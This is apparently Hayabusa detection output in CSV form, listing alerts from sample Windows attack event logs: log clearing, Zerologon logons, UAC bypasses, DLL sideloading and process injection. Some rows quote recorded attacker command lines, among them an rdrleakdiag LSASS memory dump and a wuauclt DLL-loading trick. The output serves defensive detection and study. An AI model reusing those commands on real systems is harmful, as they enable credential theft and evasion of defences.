2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,informational,Explicit Logon,Source User: svc01 : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\inetsrv\w3wp.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,System log file was cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx
2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation 02694W-WIN10 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49959 : LogonID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50106 : LogonID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50107 : LogonID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\wermgr.exe -upload : Path: C:\Windows\System32\wermgr.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,"Command: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap : Path: C:\Windows\System32\rdrleakdiag.exe : User: DESKTOP-PIU87N6\wanwan : Parent Command: ""C:\WINDOWS\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,Command: C:\WINDOWS\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,Suspicious LSASS Process Clone,,rules/sigma/process_creation/win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: POC.exe : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: Program : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: POC.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\mmc.exe"" WF.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\smartscreen.exe -Embedding : Path: C:\Windows\System32\smartscreen.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" : Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\tendyron.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\explorer.exe"" : Path: C:\Windows\SysWOW64\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe : URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe : URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: calc.exe : Path: C:\Windows\SysWOW64\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\ProgramData\Intel\CV.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca : Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
